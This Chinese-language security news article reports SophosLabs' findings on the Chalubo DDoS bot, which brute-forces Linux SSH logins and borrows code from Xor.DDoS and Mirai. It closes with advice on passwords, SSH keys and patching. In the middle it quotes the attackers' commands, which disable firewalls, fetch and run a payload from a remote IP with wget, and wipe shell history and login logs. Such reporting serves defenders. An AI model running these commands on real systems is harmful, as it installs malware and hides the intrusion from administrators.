網(wǎng)絡安全公司Sophos旗下SophosLabs在本周一(10月22日)發(fā)表的一篇博文中指出�,他們近兩個月一直在持續(xù)關注一場開始于9月初的網(wǎng)絡攻擊活動,目標是開啟了SSH服務器的Linux服務器��。而在這場攻擊活動中��,攻擊者的主要目的在于傳播一種被他們稱之為“Chalubo”的最新自動化DDos攻擊工具��。
SophosLabs的分析表明���,攻擊者使用了ChaCha流密碼來加密Chalubo的主組件以及相應的Lua腳本�����,而在最新的版本中����,攻擊者已經(jīng)采用了更常見的Windows惡意軟件原理來阻止對Chalubo的檢測。不變的是����,最新版本的Chalubo同樣整合了來自Xor.DDoS和Mirai惡意軟件家族的代碼。
在8月下旬開始傳播����,目前已有多個版本
根據(jù)SophosLabs的說法,Chalubo于8月下旬開始通過網(wǎng)絡感染目標設備�,攻擊者隨后會通過在受感染設備上發(fā)出命令來檢索它。Chalubo實際上由三部分組成:下載模塊(downloader)�����、主bot程序(最初僅能夠在具有x86處理器架構的系統(tǒng)上運行)和Lua命令腳本�。
到了10月中旬,攻擊者開始發(fā)出檢索Elknot
dropper(檢測為Linux/DDoS-AZ)的命令��,它被用于提供Chalubo(ChaCha-Lua-bot)軟件包的其余部分��。
此外,目前已經(jīng)出現(xiàn)了能夠在不同處理器架構上運行的各種bot程序版本����,包括32位和64位的ARM、x86��、x86_64��、MIPS�、MIPSEL和PowerPC。這可能表明����,這場網(wǎng)絡攻擊活動的測試階段已經(jīng)結束��,或許我們之后會看到基于Chalubo攻擊活動數(shù)量的持續(xù)上升����。
嘗試暴力破解密碼,強制登錄SSH服務器
SophosLabs表示�,由他們部署的蜜罐系統(tǒng)最初在2018年9月6日記錄了相關攻擊。Chalubo的bot程序首先會嘗試暴力破解密碼�,以強制登錄SSH服務器。
一旦攻擊者獲得了對目標設備的訪問權限���,他們就會發(fā)出以下命令:
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
chattr -i /usr/bin/wget
chmod 755 /usr/bin/wget
yum install -y wget
wget -c hxxp://117.21.191.108:8694/libsdes -P /usr/bin/
chmod 777 /usr/bin/libsdes
nohup /usr/bin/libsdes > /dev/null 2>&1 &
export HISTFILE=/dev/null
rm -f /var/log/wtmp
history -c
雖然攻擊手法十分常見���,但攻擊者使用了分層方法來下載惡意組件����,并且使用的加密方法對于Linux惡意軟件而言���,也是我們所不常見的���。
事實上,如果仔細查看負責持續(xù)攻擊的代碼段的話���,我們能夠發(fā)現(xiàn)Chalubo已經(jīng)從Xor.DDoS惡意軟件家族中復制了DelService和AddService函數(shù)�。另外�,一些代碼段復制于Mirai惡意軟件,如一些隨機函數(shù)和util_local_addr函數(shù)的擴展代碼���。
SophosLabs提出的一些預防建議和防范措施
由于Chalubo感染目標系統(tǒng)的主要方法是通過對使用通用的用戶名和密碼組合對SSH服務器的登錄憑證進行暴力破解,因此SophosLabs建議SSH服務器的系統(tǒng)管理員(包括嵌入式設備)應更改這些設備上的默認密碼��。如果可能的話,系統(tǒng)管理員最好使用SSH密鑰�����,而不是登錄密碼���。
此外�,與其他任何設備一樣���,保持系統(tǒng)更新�、及時安裝官方發(fā)布的修復補丁��,以及安裝實用的防病毒軟件都會是很好的主動防御措施����。
